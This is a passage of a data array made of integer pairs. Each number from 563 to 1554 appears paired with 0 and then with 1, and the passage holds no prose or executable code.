(563, 0),
(563, 1),
(564, 0),
(564, 1),
(565, 0),
(565, 1),
(566, 0),
(566, 1),
(567, 0),
(567, 1),
(568, 0),
(568, 1),
(569, 0),
(569, 1),
(570, 0),
(570, 1),
(571, 0),
(571, 1),
(572, 0),
(572, 1),
(573, 0),
(573, 1),
(574, 0),
(574, 1),
(575, 0),
(575, 1),
(576, 0),
(576, 1),
(577, 0),
(577, 1),
(578, 0),
(578, 1),
(579, 0),
(579, 1),
(580, 0),
(580, 1),
(581, 0),
(581, 1),
(582, 0),
(582, 1),
(583, 0),
(583, 1),
(584, 0),
(584, 1),
(585, 0),
(585, 1),
(586, 0),
(586, 1),
(587, 0),
(587, 1),
(588, 0),
(588, 1),
(589, 0),
(589, 1),
(590, 0),
(590, 1),
(591, 0),
(591, 1),
(592, 0),
(592, 1),
(593, 0),
(593, 1),
(594, 0),
(594, 1),
(595, 0),
(595, 1),
(596, 0),
(596, 1),
(597, 0),
(597, 1),
(598, 0),
(598, 1),
(599, 0),
(599, 1),
(600, 0),
(600, 1),
(601, 0),
(601, 1),
(602, 0),
(602, 1),
(603, 0),
(603, 1),
(604, 0),
(604, 1),
(605, 0),
(605, 1),
(606, 0),
(606, 1),
(607, 0),
(607, 1),
(608, 0),
(608, 1),
(609, 0),
(609, 1),
(610, 0),
(610, 1),
(611, 0),
(611, 1),
(612, 0),
(612, 1),
(613, 0),
(613, 1),
(614, 0),
(614, 1),
(615, 0),
(615, 1),
(616, 0),
(616, 1),
(617, 0),
(617, 1),
(618, 0),
(618, 1),
(619, 0),
(619, 1),
(620, 0),
(620, 1),
(621, 0),
(621, 1),
(622, 0),
(622, 1),
(623, 0),
(623, 1),
(624, 0),
(624, 1),
(625, 0),
(625, 1),
(626, 0),
(626, 1),
(627, 0),
(627, 1),
(628, 0),
(628, 1),
(629, 0),
(629, 1),
(630, 0),
(630, 1),
(631, 0),
(631, 1),
(632, 0),
(632, 1),
(633, 0),
(633, 1),
(634, 0),
(634, 1),
(635, 0),
(635, 1),
(636, 0),
(636, 1),
(637, 0),
(637, 1),
(638, 0),
(638, 1),
(639, 0),
(639, 1),
(640, 0),
(640, 1),
(641, 0),
(641, 1),
(642, 0),
(642, 1),
(643, 0),
(643, 1),
(644, 0),
(644, 1),
(645, 0),
(645, 1),
(646, 0),
(646, 1),
(647, 0),
(647, 1),
(648, 0),
(648, 1),
(649, 0),
(649, 1),
(650, 0),
(650, 1),
(651, 0),
(651, 1),
(652, 0),
(652, 1),
(653, 0),
(653, 1),
(654, 0),
(654, 1),
(655, 0),
(655, 1),
(656, 0),
(656, 1),
(657, 0),
(657, 1),
(658, 0),
(658, 1),
(659, 0),
(659, 1),
(660, 0),
(660, 1),
(661, 0),
(661, 1),
(662, 0),
(662, 1),
(663, 0),
(663, 1),
(664, 0),
(664, 1),
(665, 0),
(665, 1),
(666, 0),
(666, 1),
(667, 0),
(667, 1),
(668, 0),
(668, 1),
(669, 0),
(669, 1),
(670, 0),
(670, 1),
(671, 0),
(671, 1),
(672, 0),
(672, 1),
(673, 0),
(673, 1),
(674, 0),
(674, 1),
(675, 0),
(675, 1),
(676, 0),
(676, 1),
(677, 0),
(677, 1),
(678, 0),
(678, 1),
(679, 0),
(679, 1),
(680, 0),
(680, 1),
(681, 0),
(681, 1),
(682, 0),
(682, 1),
(683, 0),
(683, 1),
(684, 0),
(684, 1),
(685, 0),
(685, 1),
(686, 0),
(686, 1),
(687, 0),
(687, 1),
(688, 0),
(688, 1),
(689, 0),
(689, 1),
(690, 0),
(690, 1),
(691, 0),
(691, 1),
(692, 0),
(692, 1),
(693, 0),
(693, 1),
(694, 0),
(694, 1),
(695, 0),
(695, 1),
(696, 0),
(696, 1),
(697, 0),
(697, 1),
(698, 0),
(698, 1),
(699, 0),
(699, 1),
(700, 0),
(700, 1),
(701, 0),
(701, 1),
(702, 0),
(702, 1),
(703, 0),
(703, 1),
(704, 0),
(704, 1),
(705, 0),
(705, 1),
(706, 0),
(706, 1),
(707, 0),
(707, 1),
(708, 0),
(708, 1),
(709, 0),
(709, 1),
(710, 0),
(710, 1),
(711, 0),
(711, 1),
(712, 0),
(712, 1),
(713, 0),
(713, 1),
(714, 0),
(714, 1),
(715, 0),
(715, 1),
(716, 0),
(716, 1),
(717, 0),
(717, 1),
(718, 0),
(718, 1),
(719, 0),
(719, 1),
(720, 0),
(720, 1),
(721, 0),
(721, 1),
(722, 0),
(722, 1),
(723, 0),
(723, 1),
(724, 0),
(724, 1),
(725, 0),
(725, 1),
(726, 0),
(726, 1),
(727, 0),
(727, 1),
(728, 0),
(728, 1),
(729, 0),
(729, 1),
(730, 0),
(730, 1),
(731, 0),
(731, 1),
(732, 0),
(732, 1),
(733, 0),
(733, 1),
(734, 0),
(734, 1),
(735, 0),
(735, 1),
(736, 0),
(736, 1),
(737, 0),
(737, 1),
(738, 0),
(738, 1),
(739, 0),
(739, 1),
(740, 0),
(740, 1),
(741, 0),
(741, 1),
(742, 0),
(742, 1),
(743, 0),
(743, 1),
(744, 0),
(744, 1),
(745, 0),
(745, 1),
(746, 0),
(746, 1),
(747, 0),
(747, 1),
(748, 0),
(748, 1),
(749, 0),
(749, 1),
(750, 0),
(750, 1),
(751, 0),
(751, 1),
(752, 0),
(752, 1),
(753, 0),
(753, 1),
(754, 0),
(754, 1),
(755, 0),
(755, 1),
(756, 0),
(756, 1),
(757, 0),
(757, 1),
(758, 0),
(758, 1),
(759, 0),
(759, 1),
(760, 0),
(760, 1),
(761, 0),
(761, 1),
(762, 0),
(762, 1),
(763, 0),
(763, 1),
(764, 0),
(764, 1),
(765, 0),
(765, 1),
(766, 0),
(766, 1),
(767, 0),
(767, 1),
(768, 0),
(768, 1),
(769, 0),
(769, 1),
(770, 0),
(770, 1),
(771, 0),
(771, 1),
(772, 0),
(772, 1),
(773, 0),
(773, 1),
(774, 0),
(774, 1),
(775, 0),
(775, 1),
(776, 0),
(776, 1),
(777, 0),
(777, 1),
(778, 0),
(778, 1),
(779, 0),
(779, 1),
(780, 0),
(780, 1),
(781, 0),
(781, 1),
(782, 0),
(782, 1),
(783, 0),
(783, 1),
(784, 0),
(784, 1),
(785, 0),
(785, 1),
(786, 0),
(786, 1),
(787, 0),
(787, 1),
(788, 0),
(788, 1),
(789, 0),
(789, 1),
(790, 0),
(790, 1),
(791, 0),
(791, 1),
(792, 0),
(792, 1),
(793, 0),
(793, 1),
(794, 0),
(794, 1),
(795, 0),
(795, 1),
(796, 0),
(796, 1),
(797, 0),
(797, 1),
(798, 0),
(798, 1),
(799, 0),
(799, 1),
(800, 0),
(800, 1),
(801, 0),
(801, 1),
(802, 0),
(802, 1),
(803, 0),
(803, 1),
(804, 0),
(804, 1),
(805, 0),
(805, 1),
(806, 0),
(806, 1),
(807, 0),
(807, 1),
(808, 0),
(808, 1),
(809, 0),
(809, 1),
(810, 0),
(810, 1),
(811, 0),
(811, 1),
(812, 0),
(812, 1),
(813, 0),
(813, 1),
(814, 0),
(814, 1),
(815, 0),
(815, 1),
(816, 0),
(816, 1),
(817, 0),
(817, 1),
(818, 0),
(818, 1),
(819, 0),
(819, 1),
(820, 0),
(820, 1),
(821, 0),
(821, 1),
(822, 0),
(822, 1),
(823, 0),
(823, 1),
(824, 0),
(824, 1),
(825, 0),
(825, 1),
(826, 0),
(826, 1),
(827, 0),
(827, 1),
(828, 0),
(828, 1),
(829, 0),
(829, 1),
(830, 0),
(830, 1),
(831, 0),
(831, 1),
(832, 0),
(832, 1),
(833, 0),
(833, 1),
(834, 0),
(834, 1),
(835, 0),
(835, 1),
(836, 0),
(836, 1),
(837, 0),
(837, 1),
(838, 0),
(838, 1),
(839, 0),
(839, 1),
(840, 0),
(840, 1),
(841, 0),
(841, 1),
(842, 0),
(842, 1),
(843, 0),
(843, 1),
(844, 0),
(844, 1),
(845, 0),
(845, 1),
(846, 0),
(846, 1),
(847, 0),
(847, 1),
(848, 0),
(848, 1),
(849, 0),
(849, 1),
(850, 0),
(850, 1),
(851, 0),
(851, 1),
(852, 0),
(852, 1),
(853, 0),
(853, 1),
(854, 0),
(854, 1),
(855, 0),
(855, 1),
(856, 0),
(856, 1),
(857, 0),
(857, 1),
(858, 0),
(858, 1),
(859, 0),
(859, 1),
(860, 0),
(860, 1),
(861, 0),
(861, 1),
(862, 0),
(862, 1),
(863, 0),
(863, 1),
(864, 0),
(864, 1),
(865, 0),
(865, 1),
(866, 0),
(866, 1),
(867, 0),
(867, 1),
(868, 0),
(868, 1),
(869, 0),
(869, 1),
(870, 0),
(870, 1),
(871, 0),
(871, 1),
(872, 0),
(872, 1),
(873, 0),
(873, 1),
(874, 0),
(874, 1),
(875, 0),
(875, 1),
(876, 0),
(876, 1),
(877, 0),
(877, 1),
(878, 0),
(878, 1),
(879, 0),
(879, 1),
(880, 0),
(880, 1),
(881, 0),
(881, 1),
(882, 0),
(882, 1),
(883, 0),
(883, 1),
(884, 0),
(884, 1),
(885, 0),
(885, 1),
(886, 0),
(886, 1),
(887, 0),
(887, 1),
(888, 0),
(888, 1),
(889, 0),
(889, 1),
(890, 0),
(890, 1),
(891, 0),
(891, 1),
(892, 0),
(892, 1),
(893, 0),
(893, 1),
(894, 0),
(894, 1),
(895, 0),
(895, 1),
(896, 0),
(896, 1),
(897, 0),
(897, 1),
(898, 0),
(898, 1),
(899, 0),
(899, 1),
(900, 0),
(900, 1),
(901, 0),
(901, 1),
(902, 0),
(902, 1),
(903, 0),
(903, 1),
(904, 0),
(904, 1),
(905, 0),
(905, 1),
(906, 0),
(906, 1),
(907, 0),
(907, 1),
(908, 0),
(908, 1),
(909, 0),
(909, 1),
(910, 0),
(910, 1),
(911, 0),
(911, 1),
(912, 0),
(912, 1),
(913, 0),
(913, 1),
(914, 0),
(914, 1),
(915, 0),
(915, 1),
(916, 0),
(916, 1),
(917, 0),
(917, 1),
(918, 0),
(918, 1),
(919, 0),
(919, 1),
(920, 0),
(920, 1),
(921, 0),
(921, 1),
(922, 0),
(922, 1),
(923, 0),
(923, 1),
(924, 0),
(924, 1),
(925, 0),
(925, 1),
(926, 0),
(926, 1),
(927, 0),
(927, 1),
(928, 0),
(928, 1),
(929, 0),
(929, 1),
(930, 0),
(930, 1),
(931, 0),
(931, 1),
(932, 0),
(932, 1),
(933, 0),
(933, 1),
(934, 0),
(934, 1),
(935, 0),
(935, 1),
(936, 0),
(936, 1),
(937, 0),
(937, 1),
(938, 0),
(938, 1),
(939, 0),
(939, 1),
(940, 0),
(940, 1),
(941, 0),
(941, 1),
(942, 0),
(942, 1),
(943, 0),
(943, 1),
(944, 0),
(944, 1),
(945, 0),
(945, 1),
(946, 0),
(946, 1),
(947, 0),
(947, 1),
(948, 0),
(948, 1),
(949, 0),
(949, 1),
(950, 0),
(950, 1),
(951, 0),
(951, 1),
(952, 0),
(952, 1),
(953, 0),
(953, 1),
(954, 0),
(954, 1),
(955, 0),
(955, 1),
(956, 0),
(956, 1),
(957, 0),
(957, 1),
(958, 0),
(958, 1),
(959, 0),
(959, 1),
(960, 0),
(960, 1),
(961, 0),
(961, 1),
(962, 0),
(962, 1),
(963, 0),
(963, 1),
(964, 0),
(964, 1),
(965, 0),
(965, 1),
(966, 0),
(966, 1),
(967, 0),
(967, 1),
(968, 0),
(968, 1),
(969, 0),
(969, 1),
(970, 0),
(970, 1),
(971, 0),
(971, 1),
(972, 0),
(972, 1),
(973, 0),
(973, 1),
(974, 0),
(974, 1),
(975, 0),
(975, 1),
(976, 0),
(976, 1),
(977, 0),
(977, 1),
(978, 0),
(978, 1),
(979, 0),
(979, 1),
(980, 0),
(980, 1),
(981, 0),
(981, 1),
(982, 0),
(982, 1),
(983, 0),
(983, 1),
(984, 0),
(984, 1),
(985, 0),
(985, 1),
(986, 0),
(986, 1),
(987, 0),
(987, 1),
(988, 0),
(988, 1),
(989, 0),
(989, 1),
(990, 0),
(990, 1),
(991, 0),
(991, 1),
(992, 0),
(992, 1),
(993, 0),
(993, 1),
(994, 0),
(994, 1),
(995, 0),
(995, 1),
(996, 0),
(996, 1),
(997, 0),
(997, 1),
(998, 0),
(998, 1),
(999, 0),
(999, 1),
(1000, 0),
(1000, 1),
(1001, 0),
(1001, 1),
(1002, 0),
(1002, 1),
(1003, 0),
(1003, 1),
(1004, 0),
(1004, 1),
(1005, 0),
(1005, 1),
(1006, 0),
(1006, 1),
(1007, 0),
(1007, 1),
(1008, 0),
(1008, 1),
(1009, 0),
(1009, 1),
(1010, 0),
(1010, 1),
(1011, 0),
(1011, 1),
(1012, 0),
(1012, 1),
(1013, 0),
(1013, 1),
(1014, 0),
(1014, 1),
(1015, 0),
(1015, 1),
(1016, 0),
(1016, 1),
(1017, 0),
(1017, 1),
(1018, 0),
(1018, 1),
(1019, 0),
(1019, 1),
(1020, 0),
(1020, 1),
(1021, 0),
(1021, 1),
(1022, 0),
(1022, 1),
(1023, 0),
(1023, 1),
(1024, 0),
(1024, 1),
(1025, 0),
(1025, 1),
(1026, 0),
(1026, 1),
(1027, 0),
(1027, 1),
(1028, 0),
(1028, 1),
(1029, 0),
(1029, 1),
(1030, 0),
(1030, 1),
(1031, 0),
(1031, 1),
(1032, 0),
(1032, 1),
(1033, 0),
(1033, 1),
(1034, 0),
(1034, 1),
(1035, 0),
(1035, 1),
(1036, 0),
(1036, 1),
(1037, 0),
(1037, 1),
(1038, 0),
(1038, 1),
(1039, 0),
(1039, 1),
(1040, 0),
(1040, 1),
(1041, 0),
(1041, 1),
(1042, 0),
(1042, 1),
(1043, 0),
(1043, 1),
(1044, 0),
(1044, 1),
(1045, 0),
(1045, 1),
(1046, 0),
(1046, 1),
(1047, 0),
(1047, 1),
(1048, 0),
(1048, 1),
(1049, 0),
(1049, 1),
(1050, 0),
(1050, 1),
(1051, 0),
(1051, 1),
(1052, 0),
(1052, 1),
(1053, 0),
(1053, 1),
(1054, 0),
(1054, 1),
(1055, 0),
(1055, 1),
(1056, 0),
(1056, 1),
(1057, 0),
(1057, 1),
(1058, 0),
(1058, 1),
(1059, 0),
(1059, 1),
(1060, 0),
(1060, 1),
(1061, 0),
(1061, 1),
(1062, 0),
(1062, 1),
(1063, 0),
(1063, 1),
(1064, 0),
(1064, 1),
(1065, 0),
(1065, 1),
(1066, 0),
(1066, 1),
(1067, 0),
(1067, 1),
(1068, 0),
(1068, 1),
(1069, 0),
(1069, 1),
(1070, 0),
(1070, 1),
(1071, 0),
(1071, 1),
(1072, 0),
(1072, 1),
(1073, 0),
(1073, 1),
(1074, 0),
(1074, 1),
(1075, 0),
(1075, 1),
(1076, 0),
(1076, 1),
(1077, 0),
(1077, 1),
(1078, 0),
(1078, 1),
(1079, 0),
(1079, 1),
(1080, 0),
(1080, 1),
(1081, 0),
(1081, 1),
(1082, 0),
(1082, 1),
(1083, 0),
(1083, 1),
(1084, 0),
(1084, 1),
(1085, 0),
(1085, 1),
(1086, 0),
(1086, 1),
(1087, 0),
(1087, 1),
(1088, 0),
(1088, 1),
(1089, 0),
(1089, 1),
(1090, 0),
(1090, 1),
(1091, 0),
(1091, 1),
(1092, 0),
(1092, 1),
(1093, 0),
(1093, 1),
(1094, 0),
(1094, 1),
(1095, 0),
(1095, 1),
(1096, 0),
(1096, 1),
(1097, 0),
(1097, 1),
(1098, 0),
(1098, 1),
(1099, 0),
(1099, 1),
(1100, 0),
(1100, 1),
(1101, 0),
(1101, 1),
(1102, 0),
(1102, 1),
(1103, 0),
(1103, 1),
(1104, 0),
(1104, 1),
(1105, 0),
(1105, 1),
(1106, 0),
(1106, 1),
(1107, 0),
(1107, 1),
(1108, 0),
(1108, 1),
(1109, 0),
(1109, 1),
(1110, 0),
(1110, 1),
(1111, 0),
(1111, 1),
(1112, 0),
(1112, 1),
(1113, 0),
(1113, 1),
(1114, 0),
(1114, 1),
(1115, 0),
(1115, 1),
(1116, 0),
(1116, 1),
(1117, 0),
(1117, 1),
(1118, 0),
(1118, 1),
(1119, 0),
(1119, 1),
(1120, 0),
(1120, 1),
(1121, 0),
(1121, 1),
(1122, 0),
(1122, 1),
(1123, 0),
(1123, 1),
(1124, 0),
(1124, 1),
(1125, 0),
(1125, 1),
(1126, 0),
(1126, 1),
(1127, 0),
(1127, 1),
(1128, 0),
(1128, 1),
(1129, 0),
(1129, 1),
(1130, 0),
(1130, 1),
(1131, 0),
(1131, 1),
(1132, 0),
(1132, 1),
(1133, 0),
(1133, 1),
(1134, 0),
(1134, 1),
(1135, 0),
(1135, 1),
(1136, 0),
(1136, 1),
(1137, 0),
(1137, 1),
(1138, 0),
(1138, 1),
(1139, 0),
(1139, 1),
(1140, 0),
(1140, 1),
(1141, 0),
(1141, 1),
(1142, 0),
(1142, 1),
(1143, 0),
(1143, 1),
(1144, 0),
(1144, 1),
(1145, 0),
(1145, 1),
(1146, 0),
(1146, 1),
(1147, 0),
(1147, 1),
(1148, 0),
(1148, 1),
(1149, 0),
(1149, 1),
(1150, 0),
(1150, 1),
(1151, 0),
(1151, 1),
(1152, 0),
(1152, 1),
(1153, 0),
(1153, 1),
(1154, 0),
(1154, 1),
(1155, 0),
(1155, 1),
(1156, 0),
(1156, 1),
(1157, 0),
(1157, 1),
(1158, 0),
(1158, 1),
(1159, 0),
(1159, 1),
(1160, 0),
(1160, 1),
(1161, 0),
(1161, 1),
(1162, 0),
(1162, 1),
(1163, 0),
(1163, 1),
(1164, 0),
(1164, 1),
(1165, 0),
(1165, 1),
(1166, 0),
(1166, 1),
(1167, 0),
(1167, 1),
(1168, 0),
(1168, 1),
(1169, 0),
(1169, 1),
(1170, 0),
(1170, 1),
(1171, 0),
(1171, 1),
(1172, 0),
(1172, 1),
(1173, 0),
(1173, 1),
(1174, 0),
(1174, 1),
(1175, 0),
(1175, 1),
(1176, 0),
(1176, 1),
(1177, 0),
(1177, 1),
(1178, 0),
(1178, 1),
(1179, 0),
(1179, 1),
(1180, 0),
(1180, 1),
(1181, 0),
(1181, 1),
(1182, 0),
(1182, 1),
(1183, 0),
(1183, 1),
(1184, 0),
(1184, 1),
(1185, 0),
(1185, 1),
(1186, 0),
(1186, 1),
(1187, 0),
(1187, 1),
(1188, 0),
(1188, 1),
(1189, 0),
(1189, 1),
(1190, 0),
(1190, 1),
(1191, 0),
(1191, 1),
(1192, 0),
(1192, 1),
(1193, 0),
(1193, 1),
(1194, 0),
(1194, 1),
(1195, 0),
(1195, 1),
(1196, 0),
(1196, 1),
(1197, 0),
(1197, 1),
(1198, 0),
(1198, 1),
(1199, 0),
(1199, 1),
(1200, 0),
(1200, 1),
(1201, 0),
(1201, 1),
(1202, 0),
(1202, 1),
(1203, 0),
(1203, 1),
(1204, 0),
(1204, 1),
(1205, 0),
(1205, 1),
(1206, 0),
(1206, 1),
(1207, 0),
(1207, 1),
(1208, 0),
(1208, 1),
(1209, 0),
(1209, 1),
(1210, 0),
(1210, 1),
(1211, 0),
(1211, 1),
(1212, 0),
(1212, 1),
(1213, 0),
(1213, 1),
(1214, 0),
(1214, 1),
(1215, 0),
(1215, 1),
(1216, 0),
(1216, 1),
(1217, 0),
(1217, 1),
(1218, 0),
(1218, 1),
(1219, 0),
(1219, 1),
(1220, 0),
(1220, 1),
(1221, 0),
(1221, 1),
(1222, 0),
(1222, 1),
(1223, 0),
(1223, 1),
(1224, 0),
(1224, 1),
(1225, 0),
(1225, 1),
(1226, 0),
(1226, 1),
(1227, 0),
(1227, 1),
(1228, 0),
(1228, 1),
(1229, 0),
(1229, 1),
(1230, 0),
(1230, 1),
(1231, 0),
(1231, 1),
(1232, 0),
(1232, 1),
(1233, 0),
(1233, 1),
(1234, 0),
(1234, 1),
(1235, 0),
(1235, 1),
(1236, 0),
(1236, 1),
(1237, 0),
(1237, 1),
(1238, 0),
(1238, 1),
(1239, 0),
(1239, 1),
(1240, 0),
(1240, 1),
(1241, 0),
(1241, 1),
(1242, 0),
(1242, 1),
(1243, 0),
(1243, 1),
(1244, 0),
(1244, 1),
(1245, 0),
(1245, 1),
(1246, 0),
(1246, 1),
(1247, 0),
(1247, 1),
(1248, 0),
(1248, 1),
(1249, 0),
(1249, 1),
(1250, 0),
(1250, 1),
(1251, 0),
(1251, 1),
(1252, 0),
(1252, 1),
(1253, 0),
(1253, 1),
(1254, 0),
(1254, 1),
(1255, 0),
(1255, 1),
(1256, 0),
(1256, 1),
(1257, 0),
(1257, 1),
(1258, 0),
(1258, 1),
(1259, 0),
(1259, 1),
(1260, 0),
(1260, 1),
(1261, 0),
(1261, 1),
(1262, 0),
(1262, 1),
(1263, 0),
(1263, 1),
(1264, 0),
(1264, 1),
(1265, 0),
(1265, 1),
(1266, 0),
(1266, 1),
(1267, 0),
(1267, 1),
(1268, 0),
(1268, 1),
(1269, 0),
(1269, 1),
(1270, 0),
(1270, 1),
(1271, 0),
(1271, 1),
(1272, 0),
(1272, 1),
(1273, 0),
(1273, 1),
(1274, 0),
(1274, 1),
(1275, 0),
(1275, 1),
(1276, 0),
(1276, 1),
(1277, 0),
(1277, 1),
(1278, 0),
(1278, 1),
(1279, 0),
(1279, 1),
(1280, 0),
(1280, 1),
(1281, 0),
(1281, 1),
(1282, 0),
(1282, 1),
(1283, 0),
(1283, 1),
(1284, 0),
(1284, 1),
(1285, 0),
(1285, 1),
(1286, 0),
(1286, 1),
(1287, 0),
(1287, 1),
(1288, 0),
(1288, 1),
(1289, 0),
(1289, 1),
(1290, 0),
(1290, 1),
(1291, 0),
(1291, 1),
(1292, 0),
(1292, 1),
(1293, 0),
(1293, 1),
(1294, 0),
(1294, 1),
(1295, 0),
(1295, 1),
(1296, 0),
(1296, 1),
(1297, 0),
(1297, 1),
(1298, 0),
(1298, 1),
(1299, 0),
(1299, 1),
(1300, 0),
(1300, 1),
(1301, 0),
(1301, 1),
(1302, 0),
(1302, 1),
(1303, 0),
(1303, 1),
(1304, 0),
(1304, 1),
(1305, 0),
(1305, 1),
(1306, 0),
(1306, 1),
(1307, 0),
(1307, 1),
(1308, 0),
(1308, 1),
(1309, 0),
(1309, 1),
(1310, 0),
(1310, 1),
(1311, 0),
(1311, 1),
(1312, 0),
(1312, 1),
(1313, 0),
(1313, 1),
(1314, 0),
(1314, 1),
(1315, 0),
(1315, 1),
(1316, 0),
(1316, 1),
(1317, 0),
(1317, 1),
(1318, 0),
(1318, 1),
(1319, 0),
(1319, 1),
(1320, 0),
(1320, 1),
(1321, 0),
(1321, 1),
(1322, 0),
(1322, 1),
(1323, 0),
(1323, 1),
(1324, 0),
(1324, 1),
(1325, 0),
(1325, 1),
(1326, 0),
(1326, 1),
(1327, 0),
(1327, 1),
(1328, 0),
(1328, 1),
(1329, 0),
(1329, 1),
(1330, 0),
(1330, 1),
(1331, 0),
(1331, 1),
(1332, 0),
(1332, 1),
(1333, 0),
(1333, 1),
(1334, 0),
(1334, 1),
(1335, 0),
(1335, 1),
(1336, 0),
(1336, 1),
(1337, 0),
(1337, 1),
(1338, 0),
(1338, 1),
(1339, 0),
(1339, 1),
(1340, 0),
(1340, 1),
(1341, 0),
(1341, 1),
(1342, 0),
(1342, 1),
(1343, 0),
(1343, 1),
(1344, 0),
(1344, 1),
(1345, 0),
(1345, 1),
(1346, 0),
(1346, 1),
(1347, 0),
(1347, 1),
(1348, 0),
(1348, 1),
(1349, 0),
(1349, 1),
(1350, 0),
(1350, 1),
(1351, 0),
(1351, 1),
(1352, 0),
(1352, 1),
(1353, 0),
(1353, 1),
(1354, 0),
(1354, 1),
(1355, 0),
(1355, 1),
(1356, 0),
(1356, 1),
(1357, 0),
(1357, 1),
(1358, 0),
(1358, 1),
(1359, 0),
(1359, 1),
(1360, 0),
(1360, 1),
(1361, 0),
(1361, 1),
(1362, 0),
(1362, 1),
(1363, 0),
(1363, 1),
(1364, 0),
(1364, 1),
(1365, 0),
(1365, 1),
(1366, 0),
(1366, 1),
(1367, 0),
(1367, 1),
(1368, 0),
(1368, 1),
(1369, 0),
(1369, 1),
(1370, 0),
(1370, 1),
(1371, 0),
(1371, 1),
(1372, 0),
(1372, 1),
(1373, 0),
(1373, 1),
(1374, 0),
(1374, 1),
(1375, 0),
(1375, 1),
(1376, 0),
(1376, 1),
(1377, 0),
(1377, 1),
(1378, 0),
(1378, 1),
(1379, 0),
(1379, 1),
(1380, 0),
(1380, 1),
(1381, 0),
(1381, 1),
(1382, 0),
(1382, 1),
(1383, 0),
(1383, 1),
(1384, 0),
(1384, 1),
(1385, 0),
(1385, 1),
(1386, 0),
(1386, 1),
(1387, 0),
(1387, 1),
(1388, 0),
(1388, 1),
(1389, 0),
(1389, 1),
(1390, 0),
(1390, 1),
(1391, 0),
(1391, 1),
(1392, 0),
(1392, 1),
(1393, 0),
(1393, 1),
(1394, 0),
(1394, 1),
(1395, 0),
(1395, 1),
(1396, 0),
(1396, 1),
(1397, 0),
(1397, 1),
(1398, 0),
(1398, 1),
(1399, 0),
(1399, 1),
(1400, 0),
(1400, 1),
(1401, 0),
(1401, 1),
(1402, 0),
(1402, 1),
(1403, 0),
(1403, 1),
(1404, 0),
(1404, 1),
(1405, 0),
(1405, 1),
(1406, 0),
(1406, 1),
(1407, 0),
(1407, 1),
(1408, 0),
(1408, 1),
(1409, 0),
(1409, 1),
(1410, 0),
(1410, 1),
(1411, 0),
(1411, 1),
(1412, 0),
(1412, 1),
(1413, 0),
(1413, 1),
(1414, 0),
(1414, 1),
(1415, 0),
(1415, 1),
(1416, 0),
(1416, 1),
(1417, 0),
(1417, 1),
(1418, 0),
(1418, 1),
(1419, 0),
(1419, 1),
(1420, 0),
(1420, 1),
(1421, 0),
(1421, 1),
(1422, 0),
(1422, 1),
(1423, 0),
(1423, 1),
(1424, 0),
(1424, 1),
(1425, 0),
(1425, 1),
(1426, 0),
(1426, 1),
(1427, 0),
(1427, 1),
(1428, 0),
(1428, 1),
(1429, 0),
(1429, 1),
(1430, 0),
(1430, 1),
(1431, 0),
(1431, 1),
(1432, 0),
(1432, 1),
(1433, 0),
(1433, 1),
(1434, 0),
(1434, 1),
(1435, 0),
(1435, 1),
(1436, 0),
(1436, 1),
(1437, 0),
(1437, 1),
(1438, 0),
(1438, 1),
(1439, 0),
(1439, 1),
(1440, 0),
(1440, 1),
(1441, 0),
(1441, 1),
(1442, 0),
(1442, 1),
(1443, 0),
(1443, 1),
(1444, 0),
(1444, 1),
(1445, 0),
(1445, 1),
(1446, 0),
(1446, 1),
(1447, 0),
(1447, 1),
(1448, 0),
(1448, 1),
(1449, 0),
(1449, 1),
(1450, 0),
(1450, 1),
(1451, 0),
(1451, 1),
(1452, 0),
(1452, 1),
(1453, 0),
(1453, 1),
(1454, 0),
(1454, 1),
(1455, 0),
(1455, 1),
(1456, 0),
(1456, 1),
(1457, 0),
(1457, 1),
(1458, 0),
(1458, 1),
(1459, 0),
(1459, 1),
(1460, 0),
(1460, 1),
(1461, 0),
(1461, 1),
(1462, 0),
(1462, 1),
(1463, 0),
(1463, 1),
(1464, 0),
(1464, 1),
(1465, 0),
(1465, 1),
(1466, 0),
(1466, 1),
(1467, 0),
(1467, 1),
(1468, 0),
(1468, 1),
(1469, 0),
(1469, 1),
(1470, 0),
(1470, 1),
(1471, 0),
(1471, 1),
(1472, 0),
(1472, 1),
(1473, 0),
(1473, 1),
(1474, 0),
(1474, 1),
(1475, 0),
(1475, 1),
(1476, 0),
(1476, 1),
(1477, 0),
(1477, 1),
(1478, 0),
(1478, 1),
(1479, 0),
(1479, 1),
(1480, 0),
(1480, 1),
(1481, 0),
(1481, 1),
(1482, 0),
(1482, 1),
(1483, 0),
(1483, 1),
(1484, 0),
(1484, 1),
(1485, 0),
(1485, 1),
(1486, 0),
(1486, 1),
(1487, 0),
(1487, 1),
(1488, 0),
(1488, 1),
(1489, 0),
(1489, 1),
(1490, 0),
(1490, 1),
(1491, 0),
(1491, 1),
(1492, 0),
(1492, 1),
(1493, 0),
(1493, 1),
(1494, 0),
(1494, 1),
(1495, 0),
(1495, 1),
(1496, 0),
(1496, 1),
(1497, 0),
(1497, 1),
(1498, 0),
(1498, 1),
(1499, 0),
(1499, 1),
(1500, 0),
(1500, 1),
(1501, 0),
(1501, 1),
(1502, 0),
(1502, 1),
(1503, 0),
(1503, 1),
(1504, 0),
(1504, 1),
(1505, 0),
(1505, 1),
(1506, 0),
(1506, 1),
(1507, 0),
(1507, 1),
(1508, 0),
(1508, 1),
(1509, 0),
(1509, 1),
(1510, 0),
(1510, 1),
(1511, 0),
(1511, 1),
(1512, 0),
(1512, 1),
(1513, 0),
(1513, 1),
(1514, 0),
(1514, 1),
(1515, 0),
(1515, 1),
(1516, 0),
(1516, 1),
(1517, 0),
(1517, 1),
(1518, 0),
(1518, 1),
(1519, 0),
(1519, 1),
(1520, 0),
(1520, 1),
(1521, 0),
(1521, 1),
(1522, 0),
(1522, 1),
(1523, 0),
(1523, 1),
(1524, 0),
(1524, 1),
(1525, 0),
(1525, 1),
(1526, 0),
(1526, 1),
(1527, 0),
(1527, 1),
(1528, 0),
(1528, 1),
(1529, 0),
(1529, 1),
(1530, 0),
(1530, 1),
(1531, 0),
(1531, 1),
(1532, 0),
(1532, 1),
(1533, 0),
(1533, 1),
(1534, 0),
(1534, 1),
(1535, 0),
(1535, 1),
(1536, 0),
(1536, 1),
(1537, 0),
(1537, 1),
(1538, 0),
(1538, 1),
(1539, 0),
(1539, 1),
(1540, 0),
(1540, 1),
(1541, 0),
(1541, 1),
(1542, 0),
(1542, 1),
(1543, 0),
(1543, 1),
(1544, 0),
(1544, 1),
(1545, 0),
(1545, 1),
(1546, 0),
(1546, 1),
(1547, 0),
(1547, 1),
(1548, 0),
(1548, 1),
(1549, 0),
(1549, 1),
(1550, 0),
(1550, 1),
(1551, 0),
(1551, 1),
(1552, 0),
(1552, 1),
(1553, 0),
(1553, 1),
(1554, 0),
(1554, 1),
